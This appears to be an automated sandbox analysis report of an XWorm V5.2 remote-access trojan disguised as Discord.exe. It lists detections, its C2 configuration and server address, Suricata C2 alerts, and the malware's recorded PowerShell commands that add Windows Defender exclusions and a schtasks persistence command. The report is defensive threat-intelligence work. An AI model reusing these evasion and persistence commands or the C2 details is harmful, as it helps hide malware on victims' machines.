Windows Analysis Report
s3OBQLA3xR.exe

Overview

General Information

Sample name: s3OBQLA3xR.exe (renamed because original name is a hash value)
Original sample name: 2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706.exe
Analysis ID: 1532616
MD5: 8090c678b1ab88d330d94a8012682263
SHA1: 062e28c4a590a278ceff6a3931498d53db6812ec
SHA256: 2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • s3OBQLA3xR.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\s3OBQLA3xR.exe" MD5: 8090C678B1AB88D330D94A8012682263)
    • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7540 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Discord.exe (PID: 7560 cmdline: C:\Users\user\AppData\Roaming\Discord.exe MD5: 8090C678B1AB88D330D94A8012682263)
  • Discord.exe (PID: 1800 cmdline: C:\Users\user\AppData\Roaming\Discord.exe MD5: 8090C678B1AB88D330D94A8012682263)
  • Discord.exe (PID: 7944 cmdline: "C:\Users\user\AppData\Roaming\Discord.exe" MD5: 8090C678B1AB88D330D94A8012682263)
  • Discord.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Roaming\Discord.exe" MD5: 8090C678B1AB88D330D94A8012682263)
  • Discord.exe (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\Discord.exe MD5: 8090C678B1AB88D330D94A8012682263)
  • cleanup
{"C2 url": ["methods-availability.gl.at.ply.gg"], "Port": "20557", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: s3OBQLA3xR.exe
  • Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  • Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
  • Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
    • 0xde71:$s6: VirtualBox
    • 0xddcf:$s8: Win32_ComputerSystem
    • 0x10099:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x10136:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1024b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xf58b:$cnc4: POST / HTTP/1.1

Source: C:\Users\user\AppData\Roaming\Discord.exe
  • Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  • Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
  • Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
    • 0xde71:$s6: VirtualBox
    • 0xddcf:$s8: Win32_ComputerSystem
    • 0x10099:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x10136:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1024b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xf58b:$cnc4: POST / HTTP/1.1

Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp
  • Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  • Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
    • 0xd8e9:$s6: VirtualBox
    • 0xd847:$s8: Win32_ComputerSystem
    • 0xfb11:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xfbae:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xfcc3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xf003:$cnc4: POST / HTTP/1.1

Source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp
  • Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security

Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp
  • Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  • Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
    • 0xdc71:$s6: VirtualBox
    • 0xdbcf:$s8: Win32_ComputerSystem
    • 0xfe99:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xff36:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1004b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xf38b:$cnc4: POST / HTTP/1.1

Source: 0.0.s3OBQLA3xR.exe.860000.0.unpack
  • Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  • Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
  • Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
    • 0xde71:$s6: VirtualBox
    • 0xddcf:$s8: Win32_ComputerSystem
    • 0x10099:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x10136:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1024b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xf58b:$cnc4: POST / HTTP/1.1

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', ProcessId: 7476, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', ProcessId: 7476, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Discord.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\s3OBQLA3xR.exe, ProcessId: 7352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', ProcessId: 7476, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\s3OBQLA3xR.exe, ProcessId: 7352, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe", ProcessId: 7540, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', ProcessId: 7476, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T18:53:03.649760+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:53:06.230258+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:53:18.164978+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:53:30.105647+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:53:33.655222+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:53:42.035887+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:53:53.980479+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:53:58.194733+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:54:00.345370+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:54:00.560207+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:54:01.284864+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:54:03.650096+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:54:10.359906+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T18:53:06.231787+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:53:18.172927+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:53:30.108364+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:53:42.037340+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:53:53.982449+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:53:58.197296+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:54:00.347724+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:54:00.563723+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:54:01.289531+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP
2024-10-13T18:54:10.360654+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T18:53:03.649760+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:53:33.655222+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP
2024-10-13T18:54:03.650096+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.23 | 20557 | 192.168.2.4 | 49739 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T18:53:17.851676+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 147.185.221.23 | 20557 | TCP

                    AV Detection

Source: s3OBQLA3xR.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Discord.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: s3OBQLA3xR.exe | Malware Configuration Extractor: Xworm {"C2 url": ["methods-availability.gl.at.ply.gg"], "Port": "20557", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\AppData\Roaming\Discord.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Discord.exe | Virustotal: Detection: 65%
Source: s3OBQLA3xR.exe | ReversingLabs: Detection: 76%
Source: s3OBQLA3xR.exe | Virustotal: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Discord.exe | Joe Sandbox ML: detected
Source: s3OBQLA3xR.exe | Joe Sandbox ML: detected
Source: s3OBQLA3xR.exe | String decryptor: methods-availability.gl.at.ply.gg
Source: s3OBQLA3xR.exe | String decryptor: 20557
Source: s3OBQLA3xR.exe | String decryptor: <123456789>
Source: s3OBQLA3xR.exe | String decryptor: <Xwormmm>
Source: s3OBQLA3xR.exe | String decryptor: XWorm V5.2
Source: s3OBQLA3xR.exe | String decryptor: USB.exe
Source: s3OBQLA3xR.exe | String decryptor: %AppData%
Source: s3OBQLA3xR.exe | String decryptor: Discord.exe
Source: s3OBQLA3xR.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: s3OBQLA3xR.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.23:20557 -> 192.168.2.4:49739
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.23:20557 -> 192.168.2.4:49739
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49739 -> 147.185.221.23:20557
Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49739 -> 147.185.221.23:20557
Source: Malware configuration extractor | URLs: methods-availability.gl.at.ply.gg
Source: Yara match | File source: s3OBQLA3xR.exe, type: SAMPLE
Source: Yara match | File source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.4:49739 -> 147.185.221.23:20557
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 147.185.221.23
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: methods-availability.gl.at.ply.gg
Source: powershell.exe, 00000001.00000002.1792186081.00000239CFA10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsK_o
Source: powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso?
Source: powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoo
Source: s3OBQLA3xR.exe, Discord.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: s3OBQLA3xR.exe, 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                    Operating System Destruction

